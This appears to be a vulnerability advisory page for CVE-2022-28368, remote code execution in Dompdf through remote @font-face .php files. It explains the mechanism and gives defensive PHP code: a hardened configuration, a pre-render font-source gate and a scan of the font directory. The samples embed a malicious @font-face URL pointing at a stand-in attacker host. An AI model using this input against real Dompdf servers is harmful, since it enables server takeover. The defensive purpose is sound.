Cyber Resilience

CVE-2022-28368

Severity: Critical · Public PoC available

Published: 03 April 2022
Modified: 21 November 2024
KEV Added: not listed
Patch: available
CVSS v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS: 0.8891 (99.5th percentile)
Risk Priority: 73 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2022-28368 is a critical-severity remote code execution vulnerability in Dompdf, the Dompdf Project's HTML-to-PDF library for PHP. The NVD entry classifies the weakness as CWE-79 (Cross-site Scripting), but the vulnerability details below describe code execution on the rendering server, not script injection into a browser. Its CVSS v3.1 base score is 9.8 (Critical).

Operationally, it ranks in the top 0.5% of CVEs by EPSS exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

Dompdf 1.2.1 and earlier are affected by a remote code execution vulnerability triggered by an HTML document containing a CSS @font-face rule whose src:url references a .php file. When remote resource loading is enabled, the library downloads the referenced file as a font without checking that it is actually a font, and stores it in its font directory under the attacker-chosen extension. If that directory is reachable through the web server, a request for the stored .php file executes the attacker's code on the server.

An unauthenticated remote attacker can exploit the flaw simply by submitting a crafted HTML file to any application that uses Dompdf to render user-controlled documents with remote resource loading enabled. Successful exploitation grants arbitrary code execution on the server, with full confidentiality, integrity, and availability impact, as reflected in the CVSS 9.8 rating.

The project addressed the issue in commit 4c70e1025bcd9b7694b95dd552499bd83cd6141d and pull request 2808 by restricting remote fonts to known font file types; administrators should upgrade to a patched release (1.2.2 or later). Public exploit code has been published, and the vulnerability maintains an EPSS score near 0.89, indicating sustained exploitation interest well after disclosure.
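The practical hardening for an application that renders untrusted HTML with Dompdf is to turn off remote resource loading (the exploit needs Dompdf to download the attacker-hosted src:url) and to keep the directories Dompdf writes fonts into out of the web root. The following is an added example, not code from the Dompdf project or from the advisory; the option keys are real Dompdf\Options keys, while the Composer autoload path, the template directory and the font cache path are assumptions for the demo.

```php
<?php
// Added example, not Dompdf project code: a hardened Dompdf bootstrap for an
// application that renders user-controlled HTML. Assumes Composer autoloading
// of dompdf/dompdf; the directory paths are placeholders for this demo.
require_once __DIR__ . '/vendor/autoload.php';

use Dompdf\Dompdf;
use Dompdf\Options;

/**
 * Build a Dompdf instance that cannot fetch remote fonts or evaluate PHP,
 * confines local file access to $templateDir, and writes its font cache
 * to $fontCacheDir.
 */
function buildHardenedDompdf(string $templateDir, string $fontCacheDir): Dompdf
{
    $options = new Options();

    // CVE-2022-28368 needs Dompdf to download an attacker-hosted @font-face
    // src:url. With remote access off, remote URLs are refused outright.
    $options->set('isRemoteEnabled', false);

    // Never evaluate inline <?php ... ?> blocks found in the input HTML.
    $options->set('isPhpEnabled', false);

    // Local file references (images, stylesheets) are confined to this tree.
    $options->set('chroot', $templateDir);

    // Dompdf writes fonts it downloads or converts into its font directories
    // (fontDir and fontCache, both defaulting to lib/fonts under the package).
    // Neither may be reachable through the web server: keep vendor/ outside
    // the document root and point fontCache at a writable directory outside
    // it too. (assumption: $fontCacheDir is writable by PHP and not served)
    $options->set('fontCache', $fontCacheDir);

    return new Dompdf($options);
}

/**
 * Render untrusted HTML to PDF bytes with the hardened instance.
 */
function renderUntrustedHtml(string $html, string $templateDir, string $fontCacheDir): string
{
    $dompdf = buildHardenedDompdf($templateDir, $fontCacheDir);
    $dompdf->loadHtml($html);
    $dompdf->setPaper('A4', 'portrait');
    $dompdf->render();
    return $dompdf->output();
}

// Constructed sample input with the shape of a malicious document. With
// isRemoteEnabled=false the @font-face URL is never fetched, so nothing is
// written into the font directory and the text falls back to a default font.
$sample = '<style>@font-face{font-family:x;src:url("http://attacker.example/f.php");}'
        . 'body{font-family:x}</style><p>invoice</p>';

file_put_contents(
    '/tmp/out.pdf',
    renderUntrustedHtml($sample, __DIR__ . '/templates', '/var/lib/app/dompdf-fonts')
);
```

Disabling remote loading also blocks legitimate remote images and stylesheets; if those are needed, fetch them server-side under your own allow-list and reference them by local path inside the chroot rather than re-enabling isRemoteEnabled for untrusted input.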

Vulnerability details

Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).

CWE(s)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), as cited in the NVD entry. The behaviour described above is server-side code execution; the CWE assignment reflects the NVD record rather than the exploit mechanism.

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

dompdf project: dompdf, versions ≤ 1.2.1

Mitigating Controls

Likely Mitigating Controls (AI-generated)

Per-CVE control mapping has not yet run for this CVE; the controls below are derived from the weakness type (CWE-79) cited in the NVD entry, and so target cross-site scripting rather than the remote code execution actually described above.

- Penetration testing (addresses CWE-79): submits XSS payloads to web applications to detect cross-site scripting flaws for subsequent remediation.
- Input validation (addresses CWE-79): validates web inputs to reject script-related content that could produce XSS.
- Output validation (addresses CWE-79): checks generated web pages against expected content and rejects or sanitizes script content, reducing XSS exploitability.

Controls that address the mechanism described in the vulnerability details, rather than the CWE label: upgrade Dompdf past 1.2.1; disable remote resource loading for any instance that renders user-controlled HTML; keep Dompdf's font directories outside the web server's document root so that nothing it writes there can be requested and executed; and treat any file with a non-font extension appearing in those directories as an indicator of attempted exploitation.
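The input- and output-validation controls listed above translate, for this CVE, into two concrete checks around a Dompdf render: a pre-render gate that refuses HTML whose @font-face sources are remote or are not a known font type, and a scan of the font directory for the artefact this exploit leaves behind, a non-font file sitting among the fonts. The following is an added example written for this page, not Dompdf project code; the allowed-extension lists, the sample HTML and the directory path are assumptions, and it needs PHP 7.4 or later for the arrow function.

```php
<?php
// Added example (not Dompdf project code): two checks that surround a Dompdf
// render. findUnsafeFontSources() is a pre-render gate; findNonFontFilesInCache()
// looks for non-font files in a font directory. Neither calls Dompdf itself.

// Assumption: the font types your templates legitimately use. Dompdf 1.2.1
// handles TrueType/OpenType; keep this list as short as your templates allow.
const ALLOWED_FONT_EXTENSIONS = ['ttf', 'otf'];

// Assumption: file types Dompdf itself writes beside the fonts (converted
// metrics and its family cache); adjust to what your installed version writes.
const CACHE_HOUSEKEEPING_EXTENSIONS = ['ufm', 'afm', 'json'];

/** Every url(...) found inside @font-face blocks of a stylesheet or HTML string. */
function extractFontFaceUrls(string $html): array
{
    $urls = [];
    if (!preg_match_all('/@font-face\s*\{(.*?)\}/is', $html, $blocks)) {
        return $urls;
    }
    foreach ($blocks[1] as $body) {
        // Group 1 is the optional quote, group 2 the URL text between quotes.
        if (preg_match_all('/url\(\s*([\'"]?)([^\'")]+)\1\s*\)/i', $body, $m)) {
            foreach ($m[2] as $u) {
                $urls[] = trim($u);
            }
        }
    }
    return $urls;
}

/** True only for a relative, local reference whose path has an allowed font extension. */
function isSafeFontSource(string $url): bool
{
    // Anything with a scheme (http:, https:, data:, ...) or protocol-relative
    // (//host/...) is remote and refused; the exploit relies on a remote fetch.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $url) || strpos($url, '//') === 0) {
        return false;
    }
    // Judge the extension on the path only, never on the query or fragment,
    // so "font.php?x=.ttf" is not mistaken for a font.
    $path = parse_url($url, PHP_URL_PATH);
    if (!is_string($path)) {
        return false;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_FONT_EXTENSIONS, true);
}

/** Font sources in the input that should block the render. */
function findUnsafeFontSources(string $html): array
{
    return array_values(array_filter(extractFontFaceUrls($html), fn ($u) => !isSafeFontSource($u)));
}

/** Files in a Dompdf font directory whose extension is neither a font nor housekeeping. */
function findNonFontFilesInCache(string $fontDir): array
{
    $allowed = array_merge(ALLOWED_FONT_EXTENSIONS, CACHE_HOUSEKEEPING_EXTENSIONS);
    $suspicious = [];
    foreach (new DirectoryIterator($fontDir) as $entry) {
        if ($entry->isDot() || !$entry->isFile()) {
            continue;
        }
        if (!in_array(strtolower($entry->getExtension()), $allowed, true)) {
            $suspicious[] = $entry->getPathname();
        }
    }
    sort($suspicious);
    return $suspicious;
}

// Constructed sample input with the shape of a malicious document: one remote
// .php "font" and one legitimate local TrueType font.
$malicious = '<style>'
    . '@font-face { font-family: "x"; src: url("http://attacker.example/font.php"); }'
    . '@font-face { font-family: "y"; src: url(fonts/Roboto.ttf); }'
    . '</style><p style="font-family: x">invoice</p>';

$unsafe = findUnsafeFontSources($malicious);   // ['http://attacker.example/font.php']
if ($unsafe !== []) {
    // Refuse to render and leave the offending sources in the log for the SOC.
    error_log('dompdf render refused, unsafe @font-face sources: ' . implode(', ', $unsafe));
}

// Scheduled check (assumed path): anything returned here warrants an incident.
foreach (findNonFontFilesInCache('/var/lib/app/dompdf-fonts') as $file) {
    error_log('non-font file in Dompdf font directory: ' . $file);
}
```

The pre-render gate is a defence in depth, not a substitute for the patch: it sees only @font-face rules present in the submitted document, so run it alongside an upgrade and with remote loading disabled. The directory scan is cheap enough to run from cron against both fontDir and fontCache, and a hit is worth treating as an exploitation attempt rather than noise.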
